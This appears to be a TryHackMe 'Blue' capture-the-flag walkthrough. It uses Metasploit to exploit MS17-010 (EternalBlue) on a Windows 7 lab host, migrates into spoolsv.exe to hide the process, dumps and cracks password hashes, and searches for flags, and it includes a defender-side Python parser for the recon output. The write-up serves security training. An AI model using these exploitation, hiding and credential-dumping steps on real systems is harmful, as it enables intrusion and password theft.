TryHackMe - Blue
The room link can be found at TryHackMe - Blue
For this room, I will be using the Metasploit framework.
Recon
We begin with an Nmap scan of the box to see the running services and get their versions.
msf5 > db_nmap -sC -sV 10.10.47.219
Now we can see all the running services with the services command.
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.47.219 135 tcp msrpc open Microsoft Windows RPC
10.10.47.219 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.47.219 445 tcp microsoft-ds open Windows 7 Professional 7601 Service Pack 1 microsoft-ds workgroup: WORKGROUP
10.10.47.219 3389 tcp ssl/ms-wbt-server open
10.10.47.219 49152 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49153 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49154 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49158 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49160 tcp msrpc open Microsoft Windows RPC
On this machine, we will focus on the SMB service on port 445. We can gather more information using the module auxiliary/scanner/smb/smb_version. After running it, the services entry for port 445 looks more like this.
10.10.47.219 445 tcp smb open Windows 7 Professional SP1 (build:7601) (name:JON-PC) (workgroup:WORKGROUP ) (signatures:optional)
We also run auxiliary/scanner/smb/smb1 to check whether the box still supports SMBv1.
msf5 auxiliary(scanner/smb/smb1) > run
[+] 10.10.47.219:445 - 10.10.47.219 supports SMBv1 dialect.
[*] 10.10.47.219:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
As the machine name implies, the box could be exploitable via EternalBlue. Since the machine runs Windows 7 with SMBv1 enabled, it is most likely vulnerable. You can read more at Microsoft - EternalBlue.
We can check whether the machine is vulnerable by running the module auxiliary/scanner/smb/smb_ms17_010.
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.47.219:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.47.219:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
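As an added example (not part of the original writeup), the following Python reads the recon output shown above the way a defender triaging the host would: it parses the msfconsole services table and the smb1 / smb_ms17_010 scanner lines and turns them into remediation findings. The sample input is constructed from the lines on this page, and the finding ids are my own naming.

```python
"""Turn Metasploit SMB recon output into defender-side findings."""
import re

# Constructed sample input, copied from the msfconsole output in the writeup.
SERVICES_TABLE = """\
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.47.219 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.47.219 445 tcp smb open Windows 7 Professional SP1 (build:7601) (name:JON-PC) (workgroup:WORKGROUP ) (signatures:optional)
10.10.47.219 3389 tcp ssl/ms-wbt-server open
"""
SCANNER_LINES = [
    "[+] 10.10.47.219:445 - 10.10.47.219 supports SMBv1 dialect.",
    "[+] 10.10.47.219:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)",
]

# host port proto name state [info]; the header row fails the \d+ port check.
ROW = re.compile(r"^(\S+) (\d+) (\S+) (\S+) (\S+)(?: (.*))?$")
SCAN = re.compile(r"^\[\+\] (\S+):445 - (.*)$")


def parse_services(table):
    """Return one dict per data row of the `services` table (info may be empty)."""
    rows = []
    for line in table.splitlines():
        m = ROW.match(line)
        if m:
            host, port, proto, name, state, info = m.groups()
            rows.append({"host": host, "port": int(port), "proto": proto,
                         "name": name, "state": state, "info": info or ""})
    return rows


def smb_findings(rows, scanner_lines):
    """Map the recon facts to (host, finding id, remediation) tuples."""
    findings = []
    for r in rows:
        if r["port"] != 445 or r["state"] != "open":
            continue
        if "build:7601" in r["info"]:  # Windows 7 SP1, the MS17-010 target family
            findings.append((r["host"], "MS17-010", "verify the MS17-010 patch is installed"))
        if "signatures:optional" in r["info"]:
            findings.append((r["host"], "SMB_SIGNING", "SMB signing is optional; require it"))
    for line in scanner_lines:
        m = SCAN.match(line)
        if not m:
            continue
        host, msg = m.groups()
        if "supports SMBv1 dialect" in msg:
            findings.append((host, "SMBV1", "SMBv1 is enabled; disable it"))
        elif "likely VULNERABLE to MS17-010" in msg:
            findings.append((host, "MS17-010-CONFIRMED", "patch immediately and restrict port 445"))
    return findings
```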
Gain Access
Now we search for an exploit we can use in Metasploit.
msf5 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Select it using use 2, set LHOST and RHOST, and run it. The exploit may fail several times, but if you keep trying it will succeed. You could also try setting the payload to generic/shell_reverse_tcp.
Now we have a meterpreter session on the box.
Escalate
If you have a simple shell, you can use the post/multi/manage/shell_to_meterpreter module to upgrade it to a meterpreter shell.
If you have a meterpreter shell you can check who you are with:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Since we are NT AUTHORITY\SYSTEM, we have full administrative access to the box. With this privilege, we can migrate our process into spoolsv.exe to hide it, using the ps and migrate commands. Alternatively, we can run post/windows/manage/migrate to spawn a notepad process and migrate to it.
Cracking
To crack the passwords, we first need to dump them. There are two ways to do this: we can use the hashdump command and crack the hashes outside of Metasploit, or we can run the post module post/windows/gather/hashdump, which saves the hashes in the database, and then run auxiliary/analyze/crack_windows to crack them with John. The challenge suggests using the rockyou.txt wordlist.
Find flags
To find the flags, use the search command with the file name, starting from the root directory.
meterpreter > search -f flag*